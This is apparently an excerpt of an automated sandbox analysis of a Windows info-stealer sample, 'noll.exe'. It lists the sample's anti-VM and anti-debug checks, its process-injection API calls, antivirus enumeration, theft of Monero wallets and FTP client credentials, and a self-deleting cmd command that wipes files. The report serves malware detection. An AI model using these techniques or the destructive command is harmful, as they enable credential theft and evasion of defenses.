                            Source: C:\Users\user\Desktop\noll.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00098950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00098950
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_000AF142 push ecx; ret 0_2_000AF155
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_000A2D3B push esi; ret 0_2_000A2D3D
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0009DDB5 push ecx; ret 0_2_0009DDC8

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Source: C:\Users\user\Desktop\noll.exeProcess created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\noll.exe" & rd /s /q "C:\ProgramData\HJDHCFCBGIDG" & exit
                            Source: C:\Users\user\Desktop\noll.exeProcess created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\noll.exe" & rd /s /q "C:\ProgramData\HJDHCFCBGIDG" & exitJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00098950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00098950
                            Source: C:\Users\user\Desktop\noll.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Source: Yara matchFile source: noll.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.noll.exe.80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.noll.exe.80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: noll.exe PID: 3636, type: MEMORYSTR
                            Source: noll.exeBinary or memory string: DIR_WATCH.DLL
                            Source: noll.exeBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                            Source: noll.exeBinary or memory string: SBIEDLL.DLL
                            Source: noll.exeBinary or memory string: API_LOG.DLL
                            Source: C:\Users\user\Desktop\noll.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,0_2_0008180D
                            Source: C:\Windows\SysWOW64\timeout.exe TID: 4796Thread sleep count: 86 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00090DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00090EEEh0_2_00090DDB
                            Source: C:\Users\user\Desktop\noll.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0008B93F
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00095B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00095B0B
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0009543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_0009543D
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00094CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,0_2_00094CC8
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00089D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00089D1C
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0008CD37
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00081D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00081D80
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0008D5C6
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0008B5DF
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0008BF4D
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00095FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00095FD1
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00095142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00095142
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00090FBA GetSystemInfo,wsprintfA,0_2_00090FBA
                            Source: noll.exe, 00000000.00000003.2305868410.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305868410.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                            Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarem
                            Source: C:\Users\user\Desktop\noll.exeAPI call chain: ExitProcess graph end nodegraph_0-20913
                            Source: C:\Users\user\Desktop\noll.exeAPI call chain: ExitProcess graph end nodegraph_0-20898
                            Source: C:\Users\user\Desktop\noll.exeAPI call chain: ExitProcess graph end nodegraph_0-22230
                            Source: C:\Users\user\Desktop\noll.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0009D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0009D016
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00098950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00098950
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_000814AD mov eax, dword ptr fs:[00000030h]0_2_000814AD
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008148A mov eax, dword ptr fs:[00000030h]0_2_0008148A
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_000814A2 mov eax, dword ptr fs:[00000030h]0_2_000814A2
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00098599 mov eax, dword ptr fs:[00000030h]0_2_00098599
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0009859A mov eax, dword ptr fs:[00000030h]0_2_0009859A
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00091807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,0_2_00091807
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0009D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0009D016
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0009D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0009D98C
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_000A762E SetUnhandledExceptionFilter,0_2_000A762E

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: Yara matchFile source: Process Memory Space: noll.exe PID: 3636, type: MEMORYSTR
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008F54A _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_0008F54A
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0009257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_0009257F
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_000924A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_000924A8
                            Source: C:\Users\user\Desktop\noll.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\noll.exe" & rd /s /q "C:\ProgramData\HJDHCFCBGIDG" & exitJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0008111D cpuid 0_2_0008111D
                            Source: C:\Users\user\Desktop\noll.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00090DDB
                            Source: C:\Users\user\Desktop\noll.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_000AB0CC
                            Source: C:\Users\user\Desktop\noll.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_000AB1C1
                            Source: C:\Users\user\Desktop\noll.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_000A9A50
                            Source: C:\Users\user\Desktop\noll.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_000AB268
                            Source: C:\Users\user\Desktop\noll.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_000AB2C3
                            Source: C:\Users\user\Desktop\noll.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_000AAB40
                            Source: C:\Users\user\Desktop\noll.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_000A53E3
                            Source: C:\Users\user\Desktop\noll.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_000A749C
                            Source: C:\Users\user\Desktop\noll.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_000AB494
                            Source: C:\Users\user\Desktop\noll.exeCode function: EnumSystemLocalesA,0_2_000AB556
                            Source: C:\Users\user\Desktop\noll.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_000A9D6E
                            Source: C:\Users\user\Desktop\noll.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,0_2_000AE56F
                            Source: C:\Users\user\Desktop\noll.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_000A7576
                            Source: C:\Users\user\Desktop\noll.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_000AB580
                            Source: C:\Users\user\Desktop\noll.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_000A8DC4
                            Source: C:\Users\user\Desktop\noll.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_000AB5E7
                            Source: C:\Users\user\Desktop\noll.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_000AB623
                            Source: C:\Users\user\Desktop\noll.exeCode function: GetLocaleInfoA,0_2_000AE6A4
                            Source: C:\Users\user\Desktop\noll.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                            Source: C:\Users\user\Desktop\noll.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                            Source: C:\Users\user\Desktop\noll.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_0009C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,0_2_0009C0E9
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00090C53 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00090C53
                            Source: C:\Users\user\Desktop\noll.exeCode function: 0_2_00090D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00090D2E
                            Source: C:\Users\user\Desktop\noll.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: noll.exe, 00000000.00000002.2315238469.0000000002E17000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\Desktop\noll.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: noll.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.noll.exe.80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.noll.exe.80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: noll.exe PID: 3636, type: MEMORYSTR
                            Source: Yara matchFile source: noll.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.noll.exe.80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.noll.exe.80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: noll.exe PID: 3636, type: MEMORYSTR
                            Source: C:\Users\user\Desktop\noll.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                            Source: C:\Users\user\Desktop\noll.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: noll.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.noll.exe.80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.noll.exe.80000.0.unpack, type: UNPACKEDPE
